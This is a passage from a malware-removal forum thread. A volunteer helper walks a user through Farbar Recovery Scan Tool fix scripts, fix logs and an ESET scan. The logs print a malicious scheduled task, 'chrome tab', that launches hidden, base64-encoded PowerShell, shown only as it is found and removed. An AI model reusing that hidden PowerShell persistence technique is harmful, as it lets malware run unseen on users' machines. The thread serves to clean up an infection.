S3 wtbt; \??\c:\program files (x86)\steam\steamapps\common\super people playtest\engine\binaries\thirdparty\wondertrust\wtdrv64.sys [X]
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Medal] => C:\Users\Miggy\AppData\Local\Medal\update.exe [1901144 2022-01-09] (Ferox Games B.V. -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Energy] => C:\Users\Miggy\AppData\Roaming\Energy\Energy.exe --fTZuKpU (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [NZXT.CAM] => C:\Program Files\NZXT CAM\NZXT CAM.exe --startup (No File)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2021-10-17]
ShortcutTarget: IMVU.lnk -> C:\Users\Miggy\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe (No File)
Task: {2C3DB3C3-1853-4F46-9049-ADE90B75A3FA} - System32\Tasks\chrome tab => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAKACQAZQBuAGMAUwB0AHIAQQBzAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAOwAKACQAagBwAD0AJABuAHUAbABsADsACgAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAVgBhAGwAdQBlAE4AZQB3ACgAWwBzAHQAcgBpAG (the data entry has 4955 more characters). <==== ATTENTION
cmd: nets advfirewall reset
cmd: type C:\Users\Miggy\AppData\Roaming\asof
End::
===============================================
In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach it.
- How is your system running?
- Have you configured policies for Windows Update?
- Problems removing RestMinder?
- Content of fixlog.txt
Kind regards,
Axe0
Axe0
#7
miggybruh
- Topic Starter
-
- Members
- 13 posts
- OFFLINE
- Local time:06:17 PM
Posted 17 July 2022 - 08:11 PM
Hello,
My system is running great, nothing wrong with it as far as i can see. I have not configured policies for windows update. I had no problem removing restminder. here is conent of fixlog.txt
Fix result of Farbar Recovery Scan Tool (x64) Version: 14-07-2022
Ran by Miggy (17-07-2022 17:51:00) Run:1
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Boot Mode: Normal
==============================================
fixlist content:
*****************
Start::
CreateRestorePoint:
CloseProcesses:
emptytemp:
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log:F107EE40EF [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log_backup1:2DD1EC5C91 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log:CCC93B07B0 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log_backup1:AD433BF298 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log:72C8986B20 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log_backup1:97A90964FA [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log:C40F6B9209 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log_backup1:7CC29836A6 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log:AE3C879266 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log_backup1:AF8AA3CDC1 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log:DE1448F4D7 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log_backup1:D61270D3FD [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [3442]
AlternateDataStreams: C:\Users\Miggy\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Miggy\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
C:\ProgramData\DisplaySessionContainer*.log
C:\ProgramData\DisplaySessionContainer*.log_backup1
C:\Users\Miggy\AppData\Local\Programs\RestMinder
2022-07-15 22:20 - 2022-07-15 22:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\chrome_tab
2022-07-11 15:32 - 2022-07-11 15:32 - 000013970 _____ C:\WINDOWS\system32\Tasks\chrome tab
C:\users\miggy\appdata\roaming\energy
C:\users\miggy\appdata\roaming\bloom
2021-10-13 22:03 - 2021-10-13 22:03 - 000006889 _____ () C:\Users\Miggy\AppData\Roaming\9a25f6f6-1ec0-461f-a765-037f99a8a9eb.tmp
Folder: C:\Users\Miggy\AppData\Local\Enverr
Folder: C:\Users\Miggy\AppData\LocalLow\Rayll
Task: {35A6F66D-DC69-4521-8F02-D46FEAA910DC} - System32\Tasks\Microsoft\Windows\CUAssistant\CULauncher => C:\Program Files\CUAssistant\culauncher.exe (No File)
S3 cpuz150; \??\C:\WINDOWS\temp\cpuz150\cpuz150_x64.sys [X]
S3 equ8_helper; \??\C:\WINDOWS\system32\DRIVERS\equ8_helper.sys [X]
S3 wtbt; \??\c:\program files (x86)\steam\steamapps\common\super people playtest\engine\binaries\thirdparty\wondertrust\wtdrv64.sys [X]
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Medal] => C:\Users\Miggy\AppData\Local\Medal\update.exe [1901144 2022-01-09] (Ferox Games B.V. -> )
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Energy] => C:\Users\Miggy\AppData\Roaming\Energy\Energy.exe --fTZuKpU (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [NZXT.CAM] => C:\Program Files\NZXT CAM\NZXT CAM.exe --startup (No File)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2021-10-17]
ShortcutTarget: IMVU.lnk -> C:\Users\Miggy\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe (No File)
Task: {2C3DB3C3-1853-4F46-9049-ADE90B75A3FA} - System32\Tasks\chrome tab => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAKACQAZQBuAGMAUwB0AHIAQQBzAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAOwAKACQAagBwAD0AJABuAHUAbABsADsACgAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAVgBhAGwAdQBlAE4AZQB3ACgAWwBzAHQAcgBpAG (the data entry has 4955 more characters). <==== ATTENTION
cmd: nets advfirewall reset
cmd: type C:\Users\Miggy\AppData\Roaming\asof
End::
*****************
Restore point was successfully created.
Processes closed successfully.
C:\WINDOWS\tracing => ":?" ADS removed successfully
C:\ProgramData\DisplaySessionContainer1.log => ":F107EE40EF" ADS removed successfully
C:\ProgramData\DisplaySessionContainer1.log_backup1 => ":2DD1EC5C91" ADS removed successfully
C:\ProgramData\DisplaySessionContainer10.log => ":CCC93B07B0" ADS removed successfully
C:\ProgramData\DisplaySessionContainer10.log_backup1 => ":AD433BF298" ADS removed successfully
C:\ProgramData\DisplaySessionContainer11.log => ":72C8986B20" ADS removed successfully
C:\ProgramData\DisplaySessionContainer11.log_backup1 => ":97A90964FA" ADS removed successfully
C:\ProgramData\DisplaySessionContainer12.log => ":C40F6B9209" ADS removed successfully
C:\ProgramData\DisplaySessionContainer12.log_backup1 => ":7CC29836A6" ADS removed successfully
C:\ProgramData\DisplaySessionContainer13.log => ":AE3C879266" ADS removed successfully
C:\ProgramData\DisplaySessionContainer13.log_backup1 => ":AF8AA3CDC1" ADS removed successfully
C:\ProgramData\DisplaySessionContainer14.log => ":DE1448F4D7" ADS removed successfully
C:\ProgramData\DisplaySessionContainer14.log_backup1 => ":D61270D3FD" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini => ":B1DA6C571C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk => ":7661CCE9BF" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk => ":0BBB729577" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk => ":638138415C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk => ":C56174E6CE" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini => ":41964AA945" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk => ":BE32D07BC5" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk => ":980850BA8A" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => ":8096E45125" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk => ":578370639A" ADS removed successfully
C:\Users\Miggy\Application Data => ":00e481b5e22dbe1f649fcddd505d3eb7" ADS removed successfully
"C:\Users\Miggy\AppData\Roaming" => ":00e481b5e22dbe1f649fcddd505d3eb7" ADS not found.
=========== "C:\ProgramData\DisplaySessionContainer*.log" ==========
C:\ProgramData\DisplaySessionContainer1.log => moved successfully
C:\ProgramData\DisplaySessionContainer10.log => moved successfully
C:\ProgramData\DisplaySessionContainer11.log => moved successfully
C:\ProgramData\DisplaySessionContainer12.log => moved successfully
C:\ProgramData\DisplaySessionContainer13.log => moved successfully
C:\ProgramData\DisplaySessionContainer14.log => moved successfully
C:\ProgramData\DisplaySessionContainer15.log => moved successfully
C:\ProgramData\DisplaySessionContainer16.log => moved successfully
C:\ProgramData\DisplaySessionContainer17.log => moved successfully
C:\ProgramData\DisplaySessionContainer18.log => moved successfully
C:\ProgramData\DisplaySessionContainer19.log => moved successfully
C:\ProgramData\DisplaySessionContainer2.log => moved successfully
C:\ProgramData\DisplaySessionContainer20.log => moved successfully
C:\ProgramData\DisplaySessionContainer21.log => moved successfully
C:\ProgramData\DisplaySessionContainer22.log => moved successfully
C:\ProgramData\DisplaySessionContainer23.log => moved successfully
C:\ProgramData\DisplaySessionContainer24.log => moved successfully
C:\ProgramData\DisplaySessionContainer25.log => moved successfully
C:\ProgramData\DisplaySessionContainer26.log => moved successfully
C:\ProgramData\DisplaySessionContainer27.log => moved successfully
C:\ProgramData\DisplaySessionContainer28.log => moved successfully
C:\ProgramData\DisplaySessionContainer29.log => moved successfully
C:\ProgramData\DisplaySessionContainer3.log => moved successfully
C:\ProgramData\DisplaySessionContainer4.log => moved successfully
C:\ProgramData\DisplaySessionContainer5.log => moved successfully
C:\ProgramData\DisplaySessionContainer6.log => moved successfully
C:\ProgramData\DisplaySessionContainer7.log => moved successfully
C:\ProgramData\DisplaySessionContainer8.log => moved successfully
C:\ProgramData\DisplaySessionContainer9.log => moved successfully
========= End -> "C:\ProgramData\DisplaySessionContainer*.log" ========
=========== "C:\ProgramData\DisplaySessionContainer*.log_backup1" ==========
C:\ProgramData\DisplaySessionContainer1.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer10.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer11.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer12.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer13.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer14.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer15.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer16.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer17.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer18.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer19.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer2.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer20.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer21.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer22.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer23.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer24.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer25.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer3.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer4.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer5.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer6.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer7.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer8.log_backup1 => moved successfully
C:\ProgramData\DisplaySessionContainer9.log_backup1 => moved successfully
========= End -> "C:\ProgramData\DisplaySessionContainer*.log_backup1" ========
C:\Users\Miggy\AppData\Local\Programs\RestMinder => moved successfully
C:\Users\Miggy\AppData\Local\chrome_tab => moved successfully
C:\WINDOWS\system32\Tasks\chrome tab => moved successfully
"C:\users\miggy\appdata\roaming\energy" => not found
"C:\users\miggy\appdata\roaming\bloom" => not found
C:\Users\Miggy\AppData\Roaming\9a25f6f6-1ec0-461f-a765-037f99a8a9eb.tmp => moved successfully
========================= Folder: C:\Users\Miggy\AppData\Local\Enverr ========================
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved\Config
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\CrashReportClient
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\CrashReportClient\UE4CC-Windows-40C24D264EA78888025A9BAB581B8207
2022-07-14 14:26 - 2022-07-14 14:26 - 000000112 ____A [13F8815C6C6582CD5630BAC6DF8D1E7C] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\CrashReportClient\UE4CC-Windows-40C24D264EA78888025A9BAB581B8207\CrashReportClient.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Compat.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\DeviceProfiles.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\EditorScriptingUtilities.ini
2022-07-14 14:26 - 2022-07-14 14:33 - 000001488 ____A [F6B8A0250E503EA641C4081292050C6C] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Engine.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Game.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\GameplayTags.ini
2022-07-14 14:26 - 2022-07-14 14:33 - 000001096 ____A [480933AB06629BE96E05C23906DBFB30] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\GameUserSettings.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Hardware.ini
2022-07-14 14:26 - 2022-07-14 14:28 - 000000172 ____A [889CF1C393EA3ABB4B8C9A14F9C83DA9] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Input.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\MagicLeap.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\MagicLeapLightEstimation.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Niagara.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\OculusVR.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Paper2D.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\PhysXVehicles.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\RuntimeOptions.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Scalability.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\Synthesis.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000002 ____A [81051BCC2CF1BEDF378224B0A93E2877] () C:\Users\Miggy\AppData\Local\Enverr\Saved\Config\WindowsNoEditor\VariantManagerContent.ini
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\Local\Enverr\Saved\Logs
====== End of Folder: ======
========================= Folder: C:\Users\Miggy\AppData\LocalLow\Rayll ========================
2022-01-22 00:32 - 2022-01-22 22:52 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom
2022-01-22 00:32 - 2022-01-22 22:52 - 000000733 ____A [083A8801812C55BD3E8B3D2740D14382] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\output_log.txt
2022-01-22 00:50 - 2022-01-22 01:08 - 000001469 ____A [A3ACBABD7EFDC9F3C4D2399EEBAE82CA] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\SaveFile.es3
2022-01-22 00:50 - 2022-01-22 01:08 - 000001470 ____A [783FA2DB6A3F01C9568841F3DB766C45] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\SaveFile.es3.tmp.bak
2022-07-11 22:21 - 2022-07-11 22:29 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom - Norwood Hitchhike
2022-07-11 22:21 - 2022-07-11 23:20 - 000007190 ____A [56B4D0057AF27A7BAFF90E3F6492C7D1] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom - Norwood Hitchhike\Player.log
2022-07-11 22:21 - 2022-07-11 22:29 - 000001567 ____A [9FBD561A096542CA21DD49FC31ECF12B] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom - Norwood Hitchhike\Player-prev.log
2022-01-22 00:33 - 2022-01-22 00:33 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity
2022-01-22 00:33 - 2022-01-22 00:33 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity\49b47be7-2b5a-42ac-82e3-9c50b889a393
2022-01-22 00:33 - 2022-01-22 00:33 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity\49b47be7-2b5a-42ac-82e3-9c50b889a393\Analytics
2022-01-22 00:33 - 2022-01-22 22:52 - 000000304 ____A [E4BE01C27E0FD275D87412CDA20AD316] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity\49b47be7-2b5a-42ac-82e3-9c50b889a393\Analytics\config
2022-01-22 00:33 - 2022-01-22 22:54 - 000000131 ____A [6BF803170A2A16846D7B9719971CA977] () C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity\49b47be7-2b5a-42ac-82e3-9c50b889a393\Analytics\values
2022-01-22 00:33 - 2022-01-22 22:54 - 000000000 ____D [00000000000000000000000000000000] C:\Users\Miggy\AppData\LocalLow\Rayll\Fears To Fathom\Unity\49b47be7-2b5a-42ac-82e3-9c50b889a393\Analytics\ArchivedEvents
====== End of Folder: ======
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{35A6F66D-DC69-4521-8F02-D46FEAA910DC}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{35A6F66D-DC69-4521-8F02-D46FEAA910DC}" => removed successfully
C:\WINDOWS\System32\Tasks\Microsoft\Windows\CUAssistant\CULauncher => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\CUAssistant\CULauncher" => removed successfully
HKLM\System\CurrentControlSet\Services\cpuz150 => removed successfully
cpuz150 => service removed successfully
HKLM\System\CurrentControlSet\Services\equ8_helper => removed successfully
equ8_helper => service removed successfully
HKLM\System\CurrentControlSet\Services\wtbt => removed successfully
wtbt => service removed successfully
"HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Software\Microsoft\Windows\CurrentVersion\Run\\Medal" => removed successfully
"HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Software\Microsoft\Windows\CurrentVersion\Run\\Energy" => removed successfully
"HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Software\Microsoft\Windows\CurrentVersion\Run\\NZXT.CAM" => removed successfully
C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk => moved successfully
"C:\Users\Miggy\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C3DB3C3-1853-4F46-9049-ADE90B75A3FA}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C3DB3C3-1853-4F46-9049-ADE90B75A3FA}" => removed successfully
"C:\WINDOWS\System32\Tasks\chrome tab" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\chrome tab" => removed successfully
========= nets advfirewall reset =========
'nets' is not recognized as an internal or external command,
operable program or batch file.
========= End of CMD: =========
========= type C:\Users\Miggy\AppData\Roaming\asof =========
x £
========= End of CMD: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 304738127 B
Java, Discord, Steam htmlcache => 1220101557 B
Windows/system/drivers => 36588728 B
Edge => 284857 B
Chrome => 421104190 B
Firefox => 568659373 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 7268 B
NetworkService => 6541376 B
Miggy => 2688878477 B
RecycleBin => 6705440 B
EmptyTemp: => 4.9 GB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 18:02:48 ====
#8
axe0
-
- Malware Response Team
- 2,059 posts
- OFFLINE
- Gender:Male
- Location:Netherlands
- Local time:03:17 AM
Posted 18 July 2022 - 12:17 PM
Please do the following.
Run FRST Fix
Warning: This script was created for this specific system. Attempting to use the fix on another system may cause damage to the system
- Right-click FRST64.exe then click "Run as administrator".
- Select the entire content of the code below including "Start::" and "End::", right click and select "Copy"
- Click Fix button once and wait
- When finished, it will produce a log called Fixlog.txt in the same directory the tool was run from.
- Please copy and paste the log in your next reply.
Start:: CreateRestorePoint: CloseProcesses: C:\Users\Miggy\AppData\Roaming\asof cmd: netsh advfirewall reset exportkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate End::
===============================================
In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach it.
- Content of fixlog.txt
Kind regards,
Axe0
Axe0
#9
miggybruh
- Topic Starter
-
- Members
- 13 posts
- OFFLINE
- Local time:06:17 PM
Posted 19 July 2022 - 06:50 PM
here is the content of fixlog.txt
Fix result of Farbar Recovery Scan Tool (x64) Version: 18-07-2022
Ran by Miggy (19-07-2022 16:46:41) Run:2
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Boot Mode: Normal
==============================================
fixlist content:
*****************
Start::
CreateRestorePoint:
CloseProcesses:
C:\Users\Miggy\AppData\Roaming\asof
cmd: netsh advfirewall reset
exportkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
End::
*****************
Restore point was successfully created.
Processes closed successfully.
C:\Users\Miggy\AppData\Roaming\asof => moved successfully
========= netsh advfirewall reset =========
Ok.
========= End of CMD: =========
================== ExportKey: ===================
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoRebootWithLoggedOnUsers"="0"
=== End of ExportKey ===
The system needed a reboot.
==== End of Fixlog 16:46:55 ====
#10
axe0
-
- Malware Response Team
- 2,059 posts
- OFFLINE
- Gender:Male
- Location:Netherlands
- Local time:03:17 AM
Posted 20 July 2022 - 12:20 PM
The logs look good so far. The Windows Update portion is a new detection in FRST, by design FRST detects the presence of it as it may or may not have something malicious there. In your situation it is just the presence and nothing malicious there.
Please do the following next, this scanner is very thorough. After ESET is finished, please run a new scan with FRST.
ESET Online Scanner
Please download ESET Online Scanner and save it to your desktop.
- Right-click on esetonlinescanner_enu.exe and select Run as Administrator.
- When the tool opens, click Get Started.
- Read and accept the license agreement.
- At the Welcome to ESET Online Scanner window, click Get Started.
- Select whether you would like to send anonymous data to ESET.
- Note: if you see the "Welcome Back to ESET Online Scanner" screen, click Computer Scan > Full Scan.
- Click on the Full Scan option.
- Select Enable ESET to detect and remove potentially unwanted applications, then click Start scan.
- ESET will now begin scanning your computer. This may take some time.
- When the scan is finished and if threats have been detected, select Save scan log. Save it to your desktop as eset.txt. Click on Continue.
- ESET Online Scanner may ask if you'd like to turn on the Periodic Scan feature. Click on Continue.
- On the next screen, you can leave feedback about the program if you wish. Check the box for Delete application data on closing. If you left feedback, click Submit and continue. If not, Close without feedback.
- Open the scan log on your desktop (eset.txt) and copy and paste its contents into your next reply.
===============================================
In your next post
In your next post, please include the following. Make sure to copy and paste any requested logs unless asked to attach it.
- Content of eset.txt
- Content of FRST.txt
- Content of Addition.txt
Kind regards,
Axe0
Axe0
#11
miggybruh
- Topic Starter
-
- Members
- 13 posts
- OFFLINE
- Local time:06:17 PM
Posted 21 July 2022 - 07:26 PM
Here is eset.txt
7/21/2022 17:21:52 PM
Files scanned: 995544
Detected files: 3
Cleaned files: 3
Total scan time 01:55:27
Scan status: Finished
C:\FRST\Quarantine\C\Users\Miggy\AppData\Local\chrome_tab\background.js JS/Chromex.Agent.BM trojan cleaned by deleting
C:\FRST\Quarantine\C\Users\Miggy\AppData\Local\Programs\RestMinder\RestMinder.exe a variant of WinGo/Globalhop.B potentially unwanted application cleaned by deleting
